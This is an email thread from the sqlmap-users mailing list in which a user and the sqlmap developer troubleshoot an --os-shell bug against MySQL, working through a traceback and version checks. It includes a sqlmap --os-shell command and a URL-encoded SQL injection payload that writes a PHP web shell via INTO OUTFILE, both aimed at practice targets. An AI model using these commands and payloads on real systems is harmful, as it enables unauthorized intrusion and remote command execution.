Re: [sqlmap-users] SQLmap --os-shell BUG
From: Miroslav S. <mir...@gm...> - 2015-07-04 23:01:56
Something really wrong is happening here. One user is having the identical problem as you (AttributeError: 'NoneType' object has no attribute 'replace') and I am not able to reproduce it. Can you please rerun your sqlmap version with "http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get the same error?

Bye

On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:

> Just cloned git and got the 1.0-dev-166dc98 version but got an unhandled
> exception error:
>
> ./sqlmap.py -u http://OwaspPractice/injection/lessons/lesson03/index.php?code=N --os-shell --prefix "\")" --flush-session -v3
>
> /sqlmap'. If the exception persists, please open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any other information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back
> to you
> sqlmap version: 1.0-dev-166dc98
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -u ********************************************************************* --os-shell --prefix ") --flush-session -v3
> Technique: None
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 102, in main
>     start()
>   File "lib/controller/controller.py", line 514, in start
>     injection = checkSqlInjection(place, parameter, value)
>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>     reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
>   File "lib/core/agent.py", line 188, in payload
>     retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
> AttributeError: 'NoneType' object has no attribute 'replace'
>
> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> I believe that you are using an old revision. For a long time now there
>> has been at least a git revision or a pseudo "non-git" number appearing
>> when "sqlmap --version" is used.
>>
>> Please update to the latest revision from the official github repository
>> and rerun sqlmap.
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>
>>> Thanks
>>>
>>> sqlmap --version
>>> sqlmap/1.0-dev
>>>
>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>
>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>>> Which revision/version of sqlmap do you use? There was a related
>>>> patch a month ago. Will check tomorrow.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>
>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>
>>>>> Description:
>>>>>
>>>>> A specific PAYLOAD (see below) used to upload a web shell will create
>>>>> an empty file, e.g. tmpbezff.php. This will cause every subsequent
>>>>> PAYLOAD attempt to fail with an "already exist" error, and therefore
>>>>> the web shell cannot be uploaded.
>>>>>
>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%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--+
>>>>>
>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>
>>>>> mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>
>>>>> Solution:
>>>>>
>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>>>    when using the --os-shell option
>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>
>>>>> --
>>>>> DanUx
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>
>>> --
>>> DanUx
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm